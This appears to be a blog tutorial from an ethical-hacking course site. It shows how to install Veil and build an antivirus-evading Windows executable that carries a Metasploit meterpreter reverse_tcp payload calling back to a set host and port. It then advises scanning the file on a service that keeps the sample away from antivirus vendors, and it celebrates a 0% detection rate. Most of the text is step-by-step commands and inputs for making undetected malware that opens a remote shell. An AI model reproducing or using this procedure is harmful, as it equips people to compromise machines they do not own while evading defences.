Ethical Hacking Institute Course in Pune-India
Extreme Hacking | Sadik Shaikh

Veil is an awesome tool developed by Chris Truncer @ChrisTruncer, Mike Wright @TheMightyShiv and The Grayhound @the_grayhound specifically designed for Kali Linux

Disclaimer – Our tutorials are designed to aid aspiring pen testers/security enthusiasts in learning new skills, we only recommend that you test this tutorial on a system that belongs to YOU. We do not accept responsibility for anyone who thinks it’s a good idea to try to use this to attempt to hack systems that do not belong to you

I want to talk about Veil and give some examples about how to bypass several anti-virus.

The main changes in the latest versions are:

  • x64 compatibility – They have updated their setup script in order to make Veil compatible with both x86 and x64 versions.
  • Update Feature – Now Veil has an update function. Now we can update Veil either the command line or menu.

If you want to install Veil in your whatever environment you prefer, you can use the commands below:

wget https://github.com/ChrisTruncer/Veil/archive/master.zip

unzip master.zip

cd Veil-master/setup

cd ..

./setup.sh

If you want to work with Kali Linux, with the commands below it will be enough.

apt-get update

apt-get install veil 

I had a  bad experience with the second option and I prefer to install Veil with the first one using “setup.sh” script.

The Veil’s developers don’t want to submit any payload to www.virustotal.com to avoid distribution to the anti-virus vendors. There is an alternative: vscan.novirusthanks.org. That site scans the suspicious files for malware detection and offers us the option: “Do not distribute the sample”.

When Veil has been installed, just run it with the command below:

./Veil

By default in Kali Linux, we can see 18 payloads ready to be used. Now we can type “use”.

87

Here, Veil offers us more information about the payloads. In this case I chose python/b64VirtualAlloc typing “18

12

When our payload is loaded, type “generate“. You can set some specifics options, but in this post, we are going to try the default options.

11

Now we are going to select msfvenom by typing “1

a

After that, we need to type some details:

  • Enter metasploit payload: “windows/meterpreter/reverse_tcp
  • Enter value for ‘LHOST’, [tab] for local IP: “192.168.69.69”
  • Enter value for ‘LPORT’: “443

Then it’s necessary to wait while the shellcode is been generated.

v

You need to press enter and then Veil requests the name of our payload. In this case “undetectable” (or whatever you want)

f

We are going to use Pyinstaller. It will create a .exe installable. For this, we are going to type “1

4

In the end, we can get our executable at “/root/Veil-master/output/compiled/

fd

Now, we have our executable and we are going to submit it to vscan.novirusthanks.org. Please, remember to check “Do not distribute the sample“. If you choose to don’t check this options or you decide to submit the executable towww.virustotal.com your file will be investigated and maybe it will be recognized by some anti-virus vendors.

fa

You can see in the picture below any of the anti-virus vendors have detected our file as malicious. We have got a rate detection of 0%!!!!

7